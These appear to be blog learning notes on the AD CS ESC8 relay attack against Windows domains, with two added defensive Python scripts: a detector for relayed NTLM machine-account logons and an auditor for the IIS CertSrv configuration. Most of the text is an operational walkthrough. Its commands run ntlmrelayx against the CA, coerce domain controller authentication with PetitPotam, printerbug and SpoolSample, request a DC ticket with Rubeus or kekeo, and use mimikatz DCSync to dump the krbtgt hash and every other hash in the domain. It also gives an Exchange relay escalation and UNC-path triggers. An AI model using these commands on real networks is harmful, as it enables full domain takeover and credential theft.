[old text migration] ADCS ESC8 learning notes


ADCS ESC8, also known as ADCS relay, is the most widely exploited weakness in ADCS.

Related reading on ADCS ESC1 to ESC8: https://mp.weixin.qq.com/s/CG-kSHyWDnUERL4NGddiRw
Why it is exploitable:
The HTTP certificate enrollment interface of ADCS does not enable NTLM relay protection, so it is vulnerable to NTLM relay attacks. In addition, its Authorization HTTP header explicitly allows only NTLM authentication, so the Kerberos protocol cannot be used. Attackers can therefore use an NTLM relay attack against the ADCS certificate service.

1. Through the NTLM relay, we obtain a user-authentication certificate for machine A.
2. With Rubeus asktgt, we use that certificate to perform Kerberos authentication against AD.
3. We obtain a TGT and request a TGS for the target machine, which gives us access to it.

1, Add ADCS service


Select certification authority

Click Install directly

2, Configure ADCS service

Select Enterprise CA

Right-click a template > Duplicate Template

Change the name to LDAPS

Right-click > Properties > Request Handling > Allow private key to be exported

Issue the new certificate template

Request a new certificate

3, ADCS ESC8 attack


(1) Locate the certificate server with certutil

certutil -config - -ping
certutil  -ca

(2) Start ntlmrelayx listening

A patched version of impacket is required (https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack)

sudo python3 ntlmrelayx.py -t -smb2support --adcs 

(3) Trigger the callback authentication

Use a coercion script to make the secondary domain controller authenticate back to the attacking machine; the latest PetitPotam.py or printerbug.py can be used.

1. PetitPotam

python3 PetitPotam.py <kali ip> <dc ip>

2. Printerbug (requires a user account in the domain)

python3 printerbug.py mark/hacker@<dc ip> <kali ip>

(4) ntlmrelayx relays the authentication successfully and returns the certificate
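From the defender's side, the relay in step (4) leaves a trace on the CA web server (the IIS host serving /certsrv): a Security event 4624 network logon (LogonType 3) using the NTLM package for a machine account such as DC01$, arriving from the attacker's address rather than the DC's own. Because ntlmrelayx forwards the victim's own NTLM messages, the WorkstationName field still names the victim, so the source address is the field that gives the relay away. The following Python script is an added example (not from the original notes and not part of impacket) that applies that rule to a few constructed, flattened 4624 records; the field names follow the 4624 event schema, while the hosts, addresses and the INVENTORY map are made up.

```python
"""Flag NTLM network logons by machine accounts that arrive from an address
other than the machine's own: the signature left on the relay target (here the
CA web server) when a coerced DC authentication is relayed to /certsrv."""
import re
from typing import Dict, List, Set

# Constructed sample: Security event 4624 records flattened to "Key=Value"
# pairs, as a SIEM export of the CA web server's log might look. Field names
# follow the 4624 schema; hosts and addresses are invented for this example.
SAMPLE_LOG = """\
EventID=4624 TargetUserName=DC01$ TargetDomainName=MARK LogonType=3 AuthenticationPackageName=NTLM IpAddress=10.0.0.50 WorkstationName=DC01
EventID=4624 TargetUserName=DC01$ TargetDomainName=MARK LogonType=3 AuthenticationPackageName=Kerberos IpAddress=10.0.0.10 WorkstationName=DC01
EventID=4624 TargetUserName=WS01$ TargetDomainName=MARK LogonType=3 AuthenticationPackageName=NTLM IpAddress=10.0.0.21 WorkstationName=WS01
EventID=4624 TargetUserName=alice TargetDomainName=MARK LogonType=3 AuthenticationPackageName=NTLM IpAddress=10.0.0.50 WorkstationName=KALI
EventID=4624 TargetUserName=DC01$ TargetDomainName=MARK LogonType=3 AuthenticationPackageName=NTLM IpAddress=10.0.0.10 WorkstationName=DC01
"""

# Constructed inventory: machine account -> the address(es) it legitimately
# authenticates from. In production this comes from DNS/DHCP/CMDB data and
# must be kept accurate, otherwise multi-homed hosts cause false positives.
INVENTORY: Dict[str, Set[str]] = {"DC01$": {"10.0.0.10"}, "WS01$": {"10.0.0.21"}}

FIELD_RE = re.compile(r"(\w+)=(\S*)")


def parse_event(line: str) -> Dict[str, str]:
    """Split one flattened 'Key=Value Key=Value ...' record into a dict."""
    return dict(FIELD_RE.findall(line))


def is_relayed_machine_logon(event: Dict[str, str], inventory: Dict[str, Set[str]]) -> bool:
    """True when a machine account logs on over the network with NTLM from an
    address that is not one of its own. Relayed NTLM messages are the victim's
    own, so WorkstationName still names the victim; only the IP gives it away."""
    if event.get("EventID") != "4624" or event.get("LogonType") != "3":
        return False
    if event.get("AuthenticationPackageName") != "NTLM":
        return False
    account = event.get("TargetUserName", "")
    if not account.endswith("$"):
        return False
    known = inventory.get(account)
    if known is None:
        return True  # machine account not in inventory: worth a look anyway
    return event.get("IpAddress") not in known


def find_relayed_machine_logons(log_text: str, inventory: Dict[str, Set[str]] = INVENTORY) -> List[Dict[str, str]]:
    """Run the rule over every record and return the suspicious ones."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        if is_relayed_machine_logon(event, inventory):
            findings.append({
                "account": event["TargetUserName"],
                "source_ip": event.get("IpAddress", ""),
                "workstation": event.get("WorkstationName", ""),
            })
    return findings


if __name__ == "__main__":
    for f in find_relayed_machine_logons(SAMPLE_LOG):
        print(f"ALERT: {f['account']} authenticated with NTLM from {f['source_ip']} "
              f"(NTLM workstation field says {f['workstation']!r})")
```

Only the constructed DC01$ record from 10.0.0.50 is raised. The same logon seen on the DC itself is unremarkable, so this rule has to run on the logs of hosts that can be relayed to, the CA web server above all; a hit there is worth correlating with the CA's own event 4887 (certificate issued) for the same requester in the same minute.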

(5) Obtain domain admin

With this certificate, kekeo or Rubeus can request a TGT directly, after which DCSync is possible.

kekeo:
base64 /input:on
tgt::ask /pfx:xxx /user:DC01$ /ptt

Rubeus:
Rubeus.exe asktgt /user:DC01$ /certificate:xxx /ptt

With mimikatz, the hash of any user in the domain can then be dumped via DCSync:

# View the Kerberos tickets in the current session

# Dump the krbtgt user's hash
lsadump::dcsync /user:krbtgt /csv

# Dump all hashes in the domain
lsadump::dcsync /all /csv /domain:mark.com

Pitfalls:

(1) Rubeus error 1

Solution: use Rubeus version 1.6.4

(2) Rubeus error 2

Open Group Policy, go to Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options, find "Network security: Configure encryption types allowed for Kerberos" and tick all of the encryption types listed.

After enabling them, reboot; the TGT request then succeeds.

Detection and defense

  1. If the web enrollment endpoint of certificate services is not needed, disable it.
  2. Remove NTLM authentication from the IIS configuration of CertSrv (the web endpoint the attack relays to), so that NTLM can no longer be used to authenticate there and the relay is blocked.
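The two mitigations above, together with the root cause given under "Why it is exploitable" (NTLM accepted on the /certsrv endpoint without relay protection), map to three settings in the IIS configuration of the CertSrv application: the Windows authentication providers (NTLM, or plain Negotiate, which silently falls back to NTLM), the extendedProtection tokenChecking attribute (Extended Protection for Authentication, which defeats relay when set to Require), and the access sslFlags attribute (EPA can only bind to a TLS channel, so HTTP must be off). The following Python audit script is an added example, not part of the original notes: it parses a constructed applicationHost.config fragment (on a real server the file normally lives under %windir%\System32\inetsrv\config\) and reports which of the three are weak. Both XML fragments are made up for this example; the element and attribute names are IIS's own.

```python
"""Audit the IIS configuration of the AD CS web enrollment site (CertSrv) for
the settings that make ESC8 possible: NTLM accepted, no Extended Protection
for Authentication (EPA), and no TLS requirement."""
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed applicationHost.config fragment in the out-of-the-box style that
# ntlmrelayx can target: NTLM allowed, EPA off, plain HTTP allowed.
WEAK_CONFIG = """\
<configuration>
  <location path="Default Web Site/CertSrv">
    <system.webServer>
      <security>
        <access sslFlags="None" />
        <authentication>
          <anonymousAuthentication enabled="false" />
          <windowsAuthentication enabled="true">
            <extendedProtection tokenChecking="None" flags="None" />
            <providers>
              <add value="Negotiate" />
              <add value="NTLM" />
            </providers>
          </windowsAuthentication>
        </authentication>
      </security>
    </system.webServer>
  </location>
</configuration>
"""

# Constructed hardened fragment: Kerberos only, EPA required, TLS required.
HARDENED_CONFIG = """\
<configuration>
  <location path="Default Web Site/CertSrv">
    <system.webServer>
      <security>
        <access sslFlags="Ssl" />
        <authentication>
          <anonymousAuthentication enabled="false" />
          <windowsAuthentication enabled="true">
            <extendedProtection tokenChecking="Require" flags="None" />
            <providers>
              <clear />
              <add value="Negotiate:Kerberos" />
            </providers>
          </windowsAuthentication>
        </authentication>
      </security>
    </system.webServer>
  </location>
</configuration>
"""


def audit_certsrv(config_xml: str, site_path: str = "Default Web Site/CertSrv") -> Dict[str, object]:
    """Return the relevant CertSrv settings plus a list of findings (empty = hardened)."""
    root = ET.fromstring(config_xml)
    location = next((loc for loc in root.iter("location") if loc.get("path") == site_path), None)
    if location is None:
        raise ValueError(f"no <location> element for {site_path}")

    win_auth = location.find(".//windowsAuthentication")
    providers: List[str] = [
        add.get("value", "") for add in location.findall(".//windowsAuthentication/providers/add")
    ]
    ext_prot = location.find(".//windowsAuthentication/extendedProtection")
    token_checking = ext_prot.get("tokenChecking", "None") if ext_prot is not None else "None"
    access = location.find(".//access")
    ssl_flags = access.get("sslFlags", "None") if access is not None else "None"

    findings: List[str] = []
    if win_auth is not None and win_auth.get("enabled", "false").lower() == "true":
        # Plain "Negotiate" negotiates Kerberos but falls back to NTLM;
        # "Negotiate:Kerberos" does not, so it is the safe provider.
        if any(p in ("NTLM", "Negotiate") for p in providers):
            findings.append("NTLM is accepted (provider NTLM and/or plain Negotiate): relayed NTLM will be honoured")
        if token_checking != "Require":
            findings.append(f"extendedProtection tokenChecking={token_checking}: EPA is not enforced")
    if "Ssl" not in ssl_flags:
        findings.append(f"access sslFlags={ssl_flags}: HTTP is allowed, so EPA cannot bind to a TLS channel")
    return {"providers": providers, "token_checking": token_checking, "ssl_flags": ssl_flags, "findings": findings}


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        result = audit_certsrv(cfg)
        print(f"[{name}] providers={result['providers']} EPA={result['token_checking']} ssl={result['ssl_flags']}")
        for finding in result["findings"]:
            print(f"  - {finding}")
```

The weak fragment produces all three findings and the hardened one none. Requiring EPA and TLS is what actually breaks the relay even where NTLM must stay enabled for legacy clients; dropping NTLM from the providers list removes the attack surface altogether, which is the second mitigation listed above.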

4, About triggering NTLM authentication [excerpted from evi1cg's article]

(1) Passive trigger

The usual way is to construct a UNC path for the target to access, such as:

dir \\hostshare\xx

Or send an email containing an image that points at a UNC path, such as:

<img src="\\hostshare\xx">

Passive triggering depends on the target taking some action, so active triggering is generally used instead.

(2) Active trigger

Most active triggers require that we already have the account and password of a member of the domain.


Exchange is a high-value target. By default, the Exchange Windows Permissions security group has WriteDACL on the domain object of the domain in which Exchange is installed, which means it can be used to escalate privileges; it is also possible to take over the domain directly through Exchange.


This vulnerability is essentially an SSRF. Its root cause is that when Exchange's underlying logic accesses a user's "subscription", it uses the Net-NTLM hash of the SYSTEM account to access the target address. A malicious server can therefore be set up to capture the Net-NTLM hash of the Exchange server's machine account and replay and relay it to obtain administrator privileges.

Use the relay to obtain the specified user's hash directly:
python Exchange2domain.py -ah <attacker ip> -ap <listen port> -u user -p password -d domain.com -th <DC ip> <mail server ip>


Relay using the Exchange vulnerability together with the printer bug

https://www.cnblogs.com/mrhonest/p/14187849.html (section: Vulnerability overview)

1. The attacker starts the relay:
impacket-ntlmrelayx --escalate-user chenli -t ldap:// -smb2support --remove-mic --delegate-access -debug

2. Trigger the printer bug:
spoolsample.exe <exchange IP> <attacker IP>
python3 printerbug.py sync.net/chenli:cl123\!\@\#45@

RPC-based triggers

1. Printer bug vulnerability

Microsoft considers this intended behaviour and provides no patch. spoolsv.exe registers a service and several RPC interfaces, which authenticated users are allowed to call remotely. The function RemoteFindFirstPrinterChangeNotificationEx takes a UNC path, and the print service then requests that UNC path. Because the print service runs as SYSTEM, calling this RPC forces it to send an authenticated request to us, and the Net-NTLM hash obtained is that of the machine account.

python printerbug.py cgdomain.com/test:'1qaz@WSX'@


PetitPotam is a new RPC coercion method released in July of this year. After the print spooler patches were applied, many print services were shut down, so attackers developed an RPC-based method that goes through EFS instead.

Encrypting File System (EFS) is a feature introduced with NTFS 3.0 on Microsoft Windows that provides file-system-level encryption. It lets files be encrypted transparently in order to protect confidential data from attackers with physical access. EFS has been available since Windows 2000 in all Windows versions developed for business environments.

The vulnerability abuses the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC). MS-EFSRPC is Microsoft's protocol for performing "maintenance and management operations" on encrypted data that is stored remotely and accessed over the network. Using it, an attacker can connect to LSARPC and force the target machine to send its Net-NTLM hash to a specified remote server; with that Net-NTLM hash the attacker can then carry out an NTLM relay attack to take over the entire domain. This vulnerability can be used as a replacement for Printerbug.

An attacker can use the MS-EFSRPC protocol to relay the DC's NTLM credentials to the Active Directory Certificate Services (AD CS) web enrollment page, enroll a DC certificate, and then use that certificate to authenticate to the domain controller.

Like the earlier printer bug, the EFS RPC interface lets malicious domain users and/or machine accounts control the outbound authentication of other machines. Server 2012 can be triggered anonymously; on Server 2016 and later, anonymous access to the pipes is disabled by default, so credentials are required to trigger it.

python Petitpotam.py -u sanfeng -p '1qaz@WSX' -d cgdomain.com

(3) Fully patched case

If certificate services are installed, ADCS can still be used.

Posted on Wed, 24 Nov 2021 14:27:14 -0500 by JimmyD